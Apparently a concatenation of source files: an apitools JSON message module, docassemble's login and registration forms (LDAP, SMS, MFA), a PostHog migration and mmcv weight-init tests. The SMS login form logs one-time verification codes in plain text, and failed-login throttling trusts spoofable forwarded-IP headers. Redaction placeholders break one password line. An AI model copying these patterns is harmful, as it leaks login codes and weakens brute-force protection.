entries = [(f, json_value.get_assigned_value(f.name))
for f in json_value.all_fields()]
assigned_entries = [(f, value)
for f, value in entries if value is not None]
field, value = assigned_entries[0]
if not isinstance(field, messages.MessageField):
return value
elif field.message_type is JsonObject:
return _JsonObjectToPythonValue(value)
elif field.message_type is JsonArray:
return _JsonArrayToPythonValue(value)
def _JsonObjectToPythonValue(json_value):
util.Typecheck(json_value, JsonObject)
return dict([(prop.key, _JsonValueToPythonValue(prop.value)) for prop
in json_value.properties])
def _JsonArrayToPythonValue(json_value):
util.Typecheck(json_value, JsonArray)
return [_JsonValueToPythonValue(e) for e in json_value.entries]
_MAXINT64 = 2 << 63 - 1
_MININT64 = -(2 << 63)
def _PythonValueToJsonValue(py_value):
"""Convert the given python value to a JsonValue."""
if py_value is None:
return JsonValue(is_null=True)
if isinstance(py_value, bool):
return JsonValue(boolean_value=py_value)
if isinstance(py_value, six.string_types):
return JsonValue(string_value=py_value)
if isinstance(py_value, numbers.Number):
if isinstance(py_value, six.integer_types):
if _MININT64 < py_value < _MAXINT64:
return JsonValue(integer_value=py_value)
return JsonValue(double_value=float(py_value))
if isinstance(py_value, dict):
return JsonValue(object_value=_PythonValueToJsonObject(py_value))
if isinstance(py_value, Iterable):
return JsonValue(array_value=_PythonValueToJsonArray(py_value))
raise exceptions.InvalidDataError(
'Cannot convert "%s" to JsonValue' % py_value)
def _PythonValueToJsonObject(py_value):
util.Typecheck(py_value, dict)
return JsonObject(
properties=[
JsonObject.Property(key=key, value=_PythonValueToJsonValue(value))
for key, value in py_value.items()])
def _PythonValueToJsonArray(py_value):
return JsonArray(entries=list(map(_PythonValueToJsonValue, py_value)))
class JsonValue(messages.Message):
"""Any valid JSON value."""
# Is this JSON object `null`?
is_null = messages.BooleanField(1, default=False)
# Exactly one of the following is provided if is_null is False; none
# should be provided if is_null is True.
boolean_value = messages.BooleanField(2)
string_value = messages.StringField(3)
# We keep two numeric fields to keep int64 round-trips exact.
double_value = messages.FloatField(4, variant=messages.Variant.DOUBLE)
integer_value = messages.IntegerField(5, variant=messages.Variant.INT64)
# Compound types
object_value = messages.MessageField('JsonObject', 6)
array_value = messages.MessageField('JsonArray', 7)
class JsonObject(messages.Message):
"""A JSON object value.
Messages:
Property: A property of a JsonObject.
Fields:
properties: A list of properties of a JsonObject.
"""
class Property(messages.Message):
"""A property of a JSON object.
Fields:
key: Name of the property.
value: A JsonValue attribute.
"""
key = messages.StringField(1)
value = messages.MessageField(JsonValue, 2)
properties = messages.MessageField(Property, 1, repeated=True)
class JsonArray(messages.Message):
"""A JSON array value."""
entries = messages.MessageField(JsonValue, 1, repeated=True)
_JSON_PROTO_TO_PYTHON_MAP = {
JsonArray: _JsonArrayToPythonValue,
JsonObject: _JsonObjectToPythonValue,
JsonValue: _JsonValueToPythonValue,
}
_JSON_PROTO_TYPES = tuple(_JSON_PROTO_TO_PYTHON_MAP.keys())
def _JsonProtoToPythonValue(json_proto):
util.Typecheck(json_proto, _JSON_PROTO_TYPES)
return _JSON_PROTO_TO_PYTHON_MAP[type(json_proto)](json_proto)
def _PythonValueToJsonProto(py_value):
if isinstance(py_value, dict):
return _PythonValueToJsonObject(py_value)
if (isinstance(py_value, Iterable) and
not isinstance(py_value, six.string_types)):
return _PythonValueToJsonArray(py_value)
return _PythonValueToJsonValue(py_value)
def _JsonProtoToJson(json_proto, unused_encoder=None):
return json.dumps(_JsonProtoToPythonValue(json_proto))
def _JsonToJsonProto(json_data, unused_decoder=None):
return _PythonValueToJsonProto(json.loads(json_data))
def _JsonToJsonValue(json_data, unused_decoder=None):
result = _PythonValueToJsonProto(json.loads(json_data))
if isinstance(result, JsonValue):
return result
elif isinstance(result, JsonObject):
return JsonValue(object_value=result)
elif isinstance(result, JsonArray):
return JsonValue(array_value=result)
else:
raise exceptions.InvalidDataError(
'Malformed JsonValue: %s' % json_data)
# pylint:disable=invalid-name
JsonProtoEncoder = _JsonProtoToJson
JsonProtoDecoder = _JsonToJsonProto
# pylint:enable=invalid-name
encoding.RegisterCustomMessageCodec(
encoder=JsonProtoEncoder, decoder=_JsonToJsonValue)(JsonValue)
encoding.RegisterCustomMessageCodec(
encoder=JsonProtoEncoder, decoder=JsonProtoDecoder)(JsonObject)
encoding.RegisterCustomMessageCodec(
encoder=JsonProtoEncoder, decoder=JsonProtoDecoder)(JsonArray)
def _EncodeDateTimeField(field, value):
result = protojson.ProtoJson().encode_field(field, value)
return encoding.CodecResult(value=result, complete=True)
def _DecodeDateTimeField(unused_field, value):
result = protojson.ProtoJson().decode_field(
message_types.DateTimeField(1), value)
return encoding.CodecResult(value=result, complete=True)
encoding.RegisterFieldTypeCodec(_EncodeDateTimeField, _DecodeDateTimeField)(
message_types.DateTimeField)
def _EncodeInt64Field(field, value):
"""Handle the special case of int64 as a string."""
capabilities = [
messages.Variant.INT64,
messages.Variant.UINT64,
]
if field.variant not in capabilities:
return encoding.CodecResult(value=value, complete=False)
if field.repeated:
result = [str(x) for x in value]
else:
result = str(value)
return encoding.CodecResult(value=result, complete=True)
def _DecodeInt64Field(unused_field, value):
# Don't need to do anything special, they're decoded just fine
return encoding.CodecResult(value=value, complete=False)
encoding.RegisterFieldTypeCodec(_EncodeInt64Field, _DecodeInt64Field)(
messages.IntegerField)
def _EncodeDateField(field, value):
"""Encoder for datetime.date objects."""
if field.repeated:
result = [d.isoformat() for d in value]
else:
result = value.isoformat()
return encoding.CodecResult(value=result, complete=True)
def _DecodeDateField(unused_field, value):
date = datetime.datetime.strptime(value, '%Y-%m-%d').date()
return encoding.CodecResult(value=date, complete=True)
encoding.RegisterFieldTypeCodec(_EncodeDateField, _DecodeDateField)(DateField)
|
docassemble_webapp/docassemble/webapp/users/forms.py | Tucker-Eric/docassemble | 568 | 12610398 | <reponame>Tucker-Eric/docassemble<filename>docassemble_webapp/docassemble/webapp/users/forms.py
import sys
import re
from docassemble_flask_user.forms import RegisterForm, LoginForm, password_validator, unique_email_validator
from flask_wtf import FlaskForm
from wtforms import DateField, StringField, SubmitField, ValidationError, BooleanField, SelectField, SelectMultipleField, HiddenField, PasswordField, validators, TextAreaField
from wtforms.validators import DataRequired, Email, Optional
from wtforms.widgets import PasswordInput
from docassemble.base.functions import LazyWord as word, LazyArray
from docassemble.base.config import daconfig
from flask_login import current_user
import email.utils
HTTP_TO_HTTPS = daconfig.get('behind https load balancer', False)
def get_requester_ip(req):
if not req:
return '127.0.0.1'
if HTTP_TO_HTTPS:
if 'X-Real-Ip' in req.headers:
return req.headers['X-Real-Ip']
elif 'X-Forwarded-For' in req.headers:
return req.headers['X-Forwarded-For']
return req.remote_addr
try:
import ldap
except ImportError:
if 'ldap login' not in daconfig:
daconfig['ldap login'] = dict()
daconfig['ldap login']['enable'] = False
def fix_nickname(form, field):
field.data = form.first_name.data + ' ' + form.last_name.data
return
class MySignInForm(LoginForm):
def validate(self):
from docassemble.webapp.daredis import r
from flask import request, abort
key = 'da:failedlogin:ip:' + str(get_requester_ip(request))
failed_attempts = r.get(key)
if failed_attempts is not None and int(failed_attempts) > daconfig['attempt limit']:
abort(404)
if daconfig['ldap login'].get('enable', False):
ldap_server = daconfig['ldap login'].get('server', 'localhost').strip()
username = self.email.data
password = <PASSWORD>.password.data
connect = ldap.initialize('ldap://' + ldap_server)
connect.set_option(ldap.OPT_REFERRALS, 0)
try:
connect.simple_bind_s(username, password)
if not (connect.whoami_s() is None):
connect.unbind_s()
from flask import current_app
user_manager = current_app.user_manager
user, user_email = user_manager.find_user_by_email(self.email.data)
if not user:
from docassemble.base.generate_key import random_alphanumeric
from docassemble.webapp.db_object import db
from docassemble.webapp.users.models import UserModel, Role
while True:
new_social = 'ldap$' + random_alphanumeric(32)
existing_user = db.session.execute(select(UserModel).filter_by(social_id=new_social)).scalar()
if existing_user:
continue
break
user = UserModel(social_id=new_social, email=self.email.data, nickname='', active=True)
user_role = db.session.execute(select(Role).filter_by(name='user')).scalar_one()
user.roles.append(user_role)
db.session.add(user)
db.session.commit()
result = True
else:
connect.unbind_s()
result = super().validate()
except (ldap.LDAPError, ldap.INVALID_CREDENTIALS):
connect.unbind_s()
result = super().validate()
else:
from flask import current_app
user_manager = current_app.user_manager
user, user_email = user_manager.find_user_by_email(self.email.data)
if user is None:
if daconfig.get('confirm registration', False):
self.email.errors = list()
self.email.errors.append(word("Incorrect Email and/or Password"))
self.password.errors = list()
self.password.errors.append(word("Incorrect Email and/or Password"))
else:
self.email.errors = list(self.email.errors)
self.email.errors.append(word("Account did not exist."))
return False
if user and (user.password is None or (user.social_id is not None and not user.social_id.startswith('local$'))):
self.email.errors = list(self.email.errors)
if user.social_id.startswith('google$'):
self.email.errors.append(word("You need to log in with Google."))
elif user.social_id.startswith('azure$'):
self.email.errors.append(word("You need to log in with Azure."))
elif user.social_id.startswith('auth0$'):
self.email.errors.append(word("You need to log in with Auth0."))
elif user.social_id.startswith('twitter$'):
self.email.errors.append(word("You need to log in with Twitter."))
elif user.social_id.startswith('facebook$'):
self.email.errors.append(word("You need to log in with Facebook."))
else:
self.email.errors.append(word("You cannot log in this way."))
return False
#sys.stderr.write("Trying super validate\n")
result = super().validate()
#sys.stderr.write("Super validate response was " + repr(result) + "\n")
if result is False:
r.incr(key)
r.expire(key, daconfig['ban period'])
elif failed_attempts is not None:
r.delete(key)
return result
def da_unique_email_validator(form, field):
if daconfig['ldap login'].get('enable', False) and daconfig['ldap login'].get('base dn', None) is not None and daconfig['ldap login'].get('bind email', None) is not None and daconfig['ldap login'].get('bind password', None) is not None:
ldap_server = daconfig['ldap login'].get('server', 'localhost').strip()
base_dn = daconfig['ldap login']['base dn'].strip()
search_filter = daconfig['ldap login'].get('search pattern', "mail=%s") % (form.email.data,)
connect = ldap.initialize('ldap://' + ldap_server)
try:
connect.simple_bind_s(daconfig['ldap login']['bind email'], daconfig['ldap login']['bind password'])
if len(connect.search_s(base_dn, ldap.SCOPE_SUBTREE, search_filter)) > 0:
raise ValidationError(word("This Email is already in use. Please try another one."))
except ldap.LDAPError:
pass
if daconfig.get('confirm registration', False):
return True
return unique_email_validator(form, field)
class MyRegisterForm(RegisterForm):
first_name = StringField(word('First name'), [validators.Length(min=0, max=255)])
last_name = StringField(word('Last name'), [validators.Length(min=0, max=255)])
social_id = StringField(word('Social ID'))
nickname = StringField(word('Nickname'), [fix_nickname])
email = StringField(word('Email'), validators=[
validators.DataRequired(word('Email is required')),
validators.Email(word('Invalid Email')),
da_unique_email_validator])
def length_two(form, field):
if len(field.data) != 2:
raise ValidationError(word('Must be a two-letter code'))
class NewPrivilegeForm(FlaskForm):
name = StringField(word('Name of new privilege'), validators=[
DataRequired(word('Name of new privilege is required'))])
submit = SubmitField(word('Add'))
class UserProfileForm(FlaskForm):
first_name = StringField(word('First name'), [validators.Length(min=0, max=255)])
last_name = StringField(word('Last name'), [validators.Length(min=0, max=255)])
country = StringField(word('Country code'), [validators.Length(min=0, max=2)])
subdivisionfirst = StringField(word('First subdivision'), [validators.Length(min=0, max=64)])
subdivisionsecond = StringField(word('Second subdivision'), [validators.Length(min=0, max=64)])
subdivisionthird = StringField(word('Third subdivision'), [validators.Length(min=0, max=64)])
organization = StringField(word('Organization'), [validators.Length(min=0, max=64)])
language = StringField(word('Language'), [validators.Length(min=0, max=64)])
timezone = SelectField(word('Time Zone'))
pypi_username = StringField(word('PyPI Username'))
pypi_password = StringField(word('<PASSWORD>'))
confirmed_at = DateField(word('Confirmation Date'))
submit = SubmitField(word('Save'))
cancel = SubmitField(word('Cancel'))
class EditUserProfileForm(UserProfileForm):
email = StringField(word('E-mail'), validators=[Email(word('Must be a valid e-mail address')), DataRequired(word('E-mail is required'))])
role_id = SelectMultipleField(word('Privileges'), coerce=int)
active = BooleanField(word('Active'))
uses_mfa = BooleanField(word('Uses two-factor authentication'))
def validate(self, user_id, admin_id):
from flask import current_app
user_manager = current_app.user_manager
rv = UserProfileForm.validate(self)
if not rv:
return False
user, user_email = user_manager.find_user_by_email(self.email.data)
if user is not None and user.id != user_id:
self.email.errors.append(word('That e-mail address is already taken.'))
return False
if current_user.id == user_id:
if admin_id not in self.role_id.data:
self.role_id.errors.append(word('You cannot take away your own admin privilege.'))
return False
self.active.data = True
return True
class PhoneUserProfileForm(UserProfileForm):
def validate(self):
if self.email.data:
from flask_login import current_user
if current_user.social_id.startswith('phone$'):
from docassemble.webapp.db_object import db
from docassemble.webapp.users.models import UserModel
from flask import flash
existing_user = db.session.execute(select(UserModel).filter_by(email=self.email.data, active=True)).scalar()
if existing_user is not None and existing_user.id != current_user.id:
flash(word("Please choose a different e-mail address."), 'error')
return False
return super().validate()
email = StringField(word('E-mail'), validators=[Optional(), Email(word('Must be a valid e-mail address'))])
class RequestDeveloperForm(FlaskForm):
reason = StringField(word('Reason for needing developer account (optional)'))
submit = SubmitField(word('Submit'))
class MyInviteForm(FlaskForm):
def validate(self):
has_error = False
from flask import flash
if self.email.data:
for email_address in re.split(r'[\n\r]+', self.email.data.strip()):
(part_one, part_two) = email.utils.parseaddr(email_address)
if part_two == '':
the_errors = list(self.email.errors)
the_errors.append(word("Invalid e-mail address: " + email_address))
self.email.errors = tuple(the_errors)
has_error = True
if has_error:
return False
return super().validate()
email = TextAreaField(word('One or more e-mail addresses (separated by newlines)'), validators=[
validators.Required(word('At least one e-mail address must be listed'))
])
role_id = SelectField(word('Role'))
next = HiddenField()
submit = SubmitField(word('Invite'))
class UserAddForm(FlaskForm):
email = StringField(word('E-mail'), validators=[
validators.Required(word('E-mail is required')),
validators.Email(word('Invalid E-mail'))])
first_name = StringField(word('First name'), [validators.Length(min=0, max=255)])
last_name = StringField(word('Last name'), [validators.Length(min=0, max=255)])
role_id = SelectMultipleField(word('Privileges'), coerce=int)
password = StringField(word('Password'), widget=PasswordInput(hide_value=False), validators=[password_validator])
submit = SubmitField(word('Add'))
class PhoneLoginForm(FlaskForm):
phone_number = StringField(word('Phone number'), [validators.Length(min=5, max=255)])
submit = SubmitField(word('Go'))
class PhoneLoginVerifyForm(FlaskForm):
phone_number = StringField(word('Phone number'), [validators.Length(min=5, max=255)])
verification_code = StringField(word('Verification code'), [validators.Length(min=daconfig['verification code digits'], max=daconfig['verification code digits'])])
submit = SubmitField(word('Verify'))
def validate(self):
from docassemble.webapp.daredis import r
from docassemble.base.logger import logmessage
from flask import request, abort
result = True
key = 'da:failedlogin:ip:' + str(get_requester_ip(request))
failed_attempts = r.get(key)
if failed_attempts is not None and int(failed_attempts) > daconfig['attempt limit']:
abort(404)
verification_key = 'da:phonelogin:' + str(self.phone_number.data) + ':code'
verification_code = r.get(verification_key)
#r.delete(verification_key)
supplied_verification_code = re.sub(r'[^0-9]', '', self.verification_code.data)
logmessage("Supplied code is " + str(supplied_verification_code))
if verification_code is None:
logmessage("Verification code with " + str(verification_key) + " is None")
result = False
elif verification_code.decode() != supplied_verification_code:
logmessage("Verification code with " + str(verification_key) + " which is " + str(verification_code.decode()) + " does not match supplied code, which is " + str(self.verification_code.data))
result = False
else:
logmessage("Code matched")
if result is False:
logmessage("Problem with form")
r.incr(key)
r.expire(key, 86400)
elif failed_attempts is not None:
r.delete(key)
return result
class MFASetupForm(FlaskForm):
verification_code = StringField(word('Verification code'))
submit = SubmitField(word('Verify'))
class MFALoginForm(FlaskForm):
verification_code = StringField(word('Verification code'))
next = HiddenField()
submit = SubmitField(word('Verify'))
class MFAReconfigureForm(FlaskForm):
reconfigure = SubmitField(word('Reconfigure'))
disable = SubmitField(word('Disable'))
cancel = SubmitField(word('Cancel'))
class MFAChooseForm(FlaskForm):
auth = SubmitField(word('App'))
sms = SubmitField(word('SMS'))
cancel = SubmitField(word('Cancel'))
class MFASMSSetupForm(FlaskForm):
phone_number = StringField(word('Phone number'), [validators.Length(min=5, max=255)])
submit = SubmitField(word('Verify'))
class MFAVerifySMSSetupForm(FlaskForm):
verification_code = StringField(word('Verification code'))
submit = SubmitField(word('Verify'))
class MyResendConfirmEmailForm(FlaskForm):
email = StringField(word('Your e-mail address'), validators=[
validators.DataRequired(word('E-mail address is required')),
validators.Email(word('Invalid e-mail address')),
])
submit = SubmitField(word('Send confirmation email'))
class ManageAccountForm(FlaskForm):
confirm = StringField(word('Type \"delete my account\" here to confirm that you want to delete your account.'), [validators.AnyOf(LazyArray([word("delete my account")]), message=word('Since you did not type \"delete my account\" I did not delete your account.'))])
delete = SubmitField(word('Delete Account'))
|
posthog/migrations/0116_session_recording_retention_period.py | avoajaugochukwu/posthog | 7,409 | 12610409 | <reponame>avoajaugochukwu/posthog<filename>posthog/migrations/0116_session_recording_retention_period.py
# Generated by Django 3.0.11 on 2021-01-25 11:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("posthog", "0115_session_recording_viewed"),
]
operations = [
migrations.AddField(
model_name="team",
name="session_recording_retention_period_days",
field=models.IntegerField(default=None, null=True),
),
]
|
tests/test_cnn/test_weight_init.py | raoshenglong/mmcv | 3,748 | 12610417 | # Copyright (c) OpenMMLab. All rights reserved.
import random
from tempfile import TemporaryDirectory
import numpy as np
import pytest
import torch
from scipy import stats
from torch import nn
from mmcv.cnn import (Caffe2XavierInit, ConstantInit, KaimingInit, NormalInit,
PretrainedInit, TruncNormalInit, UniformInit, XavierInit,
bias_init_with_prob, caffe2_xavier_init, constant_init,
initialize, kaiming_init, normal_init, trunc_normal_init,
uniform_init, xavier_init)
def test_constant_init():
conv_module = nn.Conv2d(3, 16, 3)
constant_init(conv_module, 0.1)
assert conv_module.weight.allclose(
torch.full_like(conv_module.weight, 0.1))
assert conv_module.bias.allclose(torch.zeros_like(conv_module.bias))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
constant_init(conv_module_no_bias, 0.1)
assert conv_module.weight.allclose(
torch.full_like(conv_module.weight, 0.1))
def test_xavier_init():
conv_module = nn.Conv2d(3, 16, 3)
xavier_init(conv_module, bias=0.1)
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
xavier_init(conv_module, distribution='uniform')
# TODO: sanity check of weight distribution, e.g. mean, std
with pytest.raises(AssertionError):
xavier_init(conv_module, distribution='student-t')
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
xavier_init(conv_module_no_bias)
def test_normal_init():
conv_module = nn.Conv2d(3, 16, 3)
normal_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
normal_init(conv_module_no_bias)
# TODO: sanity check distribution, e.g. mean, std
def test_trunc_normal_init():
def _random_float(a, b):
return (b - a) * random.random() + a
def _is_trunc_normal(tensor, mean, std, a, b):
# scipy's trunc norm is suited for data drawn from N(0, 1),
# so we need to transform our data to test it using scipy.
z_samples = (tensor.view(-1) - mean) / std
z_samples = z_samples.tolist()
a0 = (a - mean) / std
b0 = (b - mean) / std
p_value = stats.kstest(z_samples, 'truncnorm', args=(a0, b0))[1]
return p_value > 0.0001
conv_module = nn.Conv2d(3, 16, 3)
mean = _random_float(-3, 3)
std = _random_float(.01, 1)
a = _random_float(mean - 2 * std, mean)
b = _random_float(mean, mean + 2 * std)
trunc_normal_init(conv_module, mean, std, a, b, bias=0.1)
assert _is_trunc_normal(conv_module.weight, mean, std, a, b)
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
trunc_normal_init(conv_module_no_bias)
# TODO: sanity check distribution, e.g. mean, std
def test_uniform_init():
conv_module = nn.Conv2d(3, 16, 3)
uniform_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
uniform_init(conv_module_no_bias)
def test_kaiming_init():
conv_module = nn.Conv2d(3, 16, 3)
kaiming_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
kaiming_init(conv_module, distribution='uniform')
with pytest.raises(AssertionError):
kaiming_init(conv_module, distribution='student-t')
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
kaiming_init(conv_module_no_bias)
def test_caffe_xavier_init():
conv_module = nn.Conv2d(3, 16, 3)
caffe2_xavier_init(conv_module)
def test_bias_init_with_prob():
conv_module = nn.Conv2d(3, 16, 3)
prior_prob = 0.1
normal_init(conv_module, bias=bias_init_with_prob(0.1))
# TODO: sanity check of weight distribution, e.g. mean, std
bias = float(-np.log((1 - prior_prob) / prior_prob))
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, bias))
def test_constaninit():
"""test ConstantInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = ConstantInit(val=1, bias=2, layer='Conv2d')
func(model)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert not torch.equal(model[2].weight,
torch.full(model[2].weight.shape, 1.))
assert not torch.equal(model[2].bias, torch.full(model[2].bias.shape, 2.))
func = ConstantInit(val=3, bias_prob=0.01, layer='Linear')
func(model)
res = bias_init_with_prob(0.01)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 3.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, res))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = ConstantInit(val=4., bias=5., layer='_ConvNd')
func(model)
assert torch.all(model[0].weight == 4.)
assert torch.all(model[2].weight == 4.)
assert torch.all(model[0].bias == 5.)
assert torch.all(model[2].bias == 5.)
# test bias input type
with pytest.raises(TypeError):
func = ConstantInit(val=1, bias='1')
# test bias_prob type
with pytest.raises(TypeError):
func = ConstantInit(val=1, bias_prob='1')
# test layer input type
with pytest.raises(TypeError):
func = ConstantInit(val=1, layer=1)
def test_xavierinit():
"""test XavierInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = XavierInit(bias=0.1, layer='Conv2d')
func(model)
assert model[0].bias.allclose(torch.full_like(model[2].bias, 0.1))
assert not model[2].bias.allclose(torch.full_like(model[0].bias, 0.1))
constant_func = ConstantInit(val=0, bias=0, layer=['Conv2d', 'Linear'])
func = XavierInit(gain=100, bias_prob=0.01, layer=['Conv2d', 'Linear'])
model.apply(constant_func)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 0.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.))
res = bias_init_with_prob(0.01)
func(model)
assert not torch.equal(model[0].weight,
torch.full(model[0].weight.shape, 0.))
assert not torch.equal(model[2].weight,
torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, res))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, res))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = ConstantInit(val=4., bias=5., layer='_ConvNd')
func(model)
assert torch.all(model[0].weight == 4.)
assert torch.all(model[2].weight == 4.)
assert torch.all(model[0].bias == 5.)
assert torch.all(model[2].bias == 5.)
func = XavierInit(gain=100, bias_prob=0.01, layer='_ConvNd')
func(model)
assert not torch.all(model[0].weight == 4.)
assert not torch.all(model[2].weight == 4.)
assert torch.all(model[0].bias == res)
assert torch.all(model[2].bias == res)
# test bias input type
with pytest.raises(TypeError):
func = XavierInit(bias='0.1', layer='Conv2d')
# test layer inpur type
with pytest.raises(TypeError):
func = XavierInit(bias=0.1, layer=1)
def test_normalinit():
"""test Normalinit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = NormalInit(mean=100, std=1e-5, bias=200, layer=['Conv2d', 'Linear'])
func(model)
assert model[0].weight.allclose(torch.tensor(100.))
assert model[2].weight.allclose(torch.tensor(100.))
assert model[0].bias.allclose(torch.tensor(200.))
assert model[2].bias.allclose(torch.tensor(200.))
func = NormalInit(
mean=300, std=1e-5, bias_prob=0.01, layer=['Conv2d', 'Linear'])
res = bias_init_with_prob(0.01)
func(model)
assert model[0].weight.allclose(torch.tensor(300.))
assert model[2].weight.allclose(torch.tensor(300.))
assert model[0].bias.allclose(torch.tensor(res))
assert model[2].bias.allclose(torch.tensor(res))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = NormalInit(mean=300, std=1e-5, bias_prob=0.01, layer='_ConvNd')
func(model)
assert model[0].weight.allclose(torch.tensor(300.))
assert model[2].weight.allclose(torch.tensor(300.))
assert torch.all(model[0].bias == res)
assert torch.all(model[2].bias == res)
def test_truncnormalinit():
"""test TruncNormalInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = TruncNormalInit(
mean=100, std=1e-5, bias=200, a=0, b=200, layer=['Conv2d', 'Linear'])
func(model)
assert model[0].weight.allclose(torch.tensor(100.))
assert model[2].weight.allclose(torch.tensor(100.))
assert model[0].bias.allclose(torch.tensor(200.))
assert model[2].bias.allclose(torch.tensor(200.))
func = TruncNormalInit(
mean=300,
std=1e-5,
a=100,
b=400,
bias_prob=0.01,
layer=['Conv2d', 'Linear'])
res = bias_init_with_prob(0.01)
func(model)
assert model[0].weight.allclose(torch.tensor(300.))
assert model[2].weight.allclose(torch.tensor(300.))
assert model[0].bias.allclose(torch.tensor(res))
assert model[2].bias.allclose(torch.tensor(res))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = TruncNormalInit(
mean=300, std=1e-5, a=100, b=400, bias_prob=0.01, layer='_ConvNd')
func(model)
assert model[0].weight.allclose(torch.tensor(300.))
assert model[2].weight.allclose(torch.tensor(300.))
assert torch.all(model[0].bias == res)
assert torch.all(model[2].bias == res)
def test_uniforminit():
""""test UniformInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = UniformInit(a=1, b=1, bias=2, layer=['Conv2d', 'Linear'])
func(model)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 1.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 2.))
func = UniformInit(a=100, b=100, layer=['Conv2d', 'Linear'], bias=10)
func(model)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape,
100.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape,
100.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 10.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 10.))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = UniformInit(a=100, b=100, bias_prob=0.01, layer='_ConvNd')
res = bias_init_with_prob(0.01)
func(model)
assert torch.all(model[0].weight == 100.)
assert torch.all(model[2].weight == 100.)
assert torch.all(model[0].bias == res)
assert torch.all(model[2].bias == res)
def test_kaiminginit():
"""test KaimingInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = KaimingInit(bias=0.1, layer='Conv2d')
func(model)
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.1))
assert not torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.1))
func = KaimingInit(a=100, bias=10, layer=['Conv2d', 'Linear'])
constant_func = ConstantInit(val=0, bias=0, layer=['Conv2d', 'Linear'])
model.apply(constant_func)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 0.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.))
func(model)
assert not torch.equal(model[0].weight,
torch.full(model[0].weight.shape, 0.))
assert not torch.equal(model[2].weight,
torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 10.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 10.))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = KaimingInit(bias=0.1, layer='_ConvNd')
func(model)
assert torch.all(model[0].bias == 0.1)
assert torch.all(model[2].bias == 0.1)
func = KaimingInit(a=100, bias=10, layer='_ConvNd')
constant_func = ConstantInit(val=0, bias=0, layer='_ConvNd')
model.apply(constant_func)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 0.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.))
func(model)
assert not torch.equal(model[0].weight,
torch.full(model[0].weight.shape, 0.))
assert not torch.equal(model[2].weight,
torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 10.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 10.))
def test_caffe2xavierinit():
